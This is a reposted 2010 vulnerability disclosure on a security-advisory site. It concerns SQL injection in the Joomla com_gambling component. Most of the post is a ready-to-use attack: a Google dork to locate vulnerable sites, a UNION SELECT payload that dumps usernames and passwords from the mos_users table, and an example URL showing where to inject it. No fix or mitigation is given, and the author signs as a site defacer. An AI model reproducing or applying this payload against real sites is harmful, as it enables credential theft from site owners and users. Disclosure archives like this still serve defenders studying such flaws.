Computer Security

Security Advisory: Joomla (com_gambling) SQL Injection Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA-1990-1] New trac-git packages fix code execution

  [SECURITY] [DSA-1990-2] New trac-git package fixes regression

  OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

  PR09-19: Cross-Site Scripting (XSS) on CommonSpot server

From:md.r00t.defacer_(at)_gmail.com <md.r00t.defacer_(at)_gmail.com>
Date:04.02.2010
Subject:Joomla (com_gambling) SQL Injection Vulnerabilities

#------------------In The Name Of God------------
# Joomla (com_gambling) SQL Injection Vulnerabilities
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@gmail.com
#Webstie: www.r00t.gigfa.com
#Forum: http://forum.aria-security.com
#
###################################
#Google D0rk:
# inurl:"com_gambling"
###################################
#Exploit:
#---------
# -9999+union+select+1,concat(username,0x3a,password)+from+mos_users/*
###################################
#Example:
#
#http://www.Site.com/index.php?option=com_gambling&Itemid=64&task=showGam
e&gamblingSid=10&gamblingEvent=[Exploit]
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server